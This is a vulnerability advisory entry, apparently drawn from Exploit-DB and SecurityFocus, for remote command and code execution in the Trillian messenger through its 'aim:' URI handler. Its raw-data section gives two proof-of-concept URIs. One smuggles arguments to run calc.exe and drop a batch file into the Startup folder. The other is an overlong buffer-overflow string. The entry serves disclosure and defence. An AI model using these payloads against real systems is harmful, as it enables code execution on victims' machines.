Trillian Remote Command- and Code-Execution Vulnerabilities

vendor:

Trillian

by:

SecurityFocus

9.3

CVSS

HIGH

Remote Command- and Code-Execution

CWE

Product Name: Trillian

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

Trillian Remote Command- and Code-Execution Vulnerabilities

Trillian is prone to remote command- and code-execution vulnerabilities because the application fails to properly handle user-supplied input via a registered URI. Successfully exploiting these issues allows attackers to execute arbitrary commands or code in the context of the affected application.

Mitigation:

Users should avoid opening untrusted links or files from untrusted sources.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24927/info

Trillian is prone to remote command- and code-execution vulnerabilities because the application fails to properly handle user-supplied input via a registered URI.

Successfully exploiting these issues allows attackers to execute arbitrary commands or code in the context of the affected application. 

aim:%20&c:/windows/system32/calc.exe%22%20ini=%22C:/Documents%20and%20Settings/All%20Users/Start%20Menu/Programs/Startup/pwnd.bat%22

aim:/#1111111/11111111111111111111111111111111111111111111111111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222226666666AAAABBBB6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666